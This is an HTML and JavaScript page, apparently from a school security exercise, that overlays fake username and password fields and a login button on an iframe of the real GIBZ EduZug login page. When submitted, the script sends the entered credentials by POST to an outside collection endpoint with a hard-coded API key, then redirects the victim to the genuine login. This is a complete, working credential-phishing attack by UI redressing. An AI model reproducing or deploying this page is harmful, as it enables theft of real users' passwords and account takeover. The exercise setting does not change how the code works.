<style>
    .inputUsername {
        position: fixed;
        top: 240px;
        right: 40.8%;
        margin: 0px;
        padding: 3px;
        font-size: 13px;
        width: 371px;
    }
    .inputPassword {
        position: fixed;
        top: 290px;
        right: 40.8%;
        margin: 0px;
        padding: 3px;
        font-size: 13px;
        width: 371px;
    }
    .submit {
        padding: 2px 7px;
        position: fixed;
        top: 352px;
        left: 39.9%;
    }
</style>

<body>
    <iframe id="frame" src="https://gibz.zg.ch/login" style="border: 0; width: 100%; height: 100%;" title="EduZug"></iframe>

    <input id="username" type="text" class="inputUsername"/>
    <input id="password" type="password" class="inputPassword"/>
    <button class="submit" onclick="send()">Anmelden</button>
</body>

<script>
    function send() {
        const payload = {
            "username": document.getElementById('username').value,
            "password": document.getElementById('password').value
        };

        fetch('https://m183.gibz-informatik.ch/api/uiredresscredential', {
            method: 'POST',
            headers: {
            'Content-Type': 'application/json',
            'X-Api-Key': 'NAA0ADMAMwA5ADIAMgA4ADYAMwA2ADYAOAA0ADgAMgAwADYA',
            },
            body: JSON.stringify(payload),
        });

        setTimeout(() => {
            window.location.href = 'https://gibz.zg.ch/login/sls/auth';
        }, 2000);
    }
</script>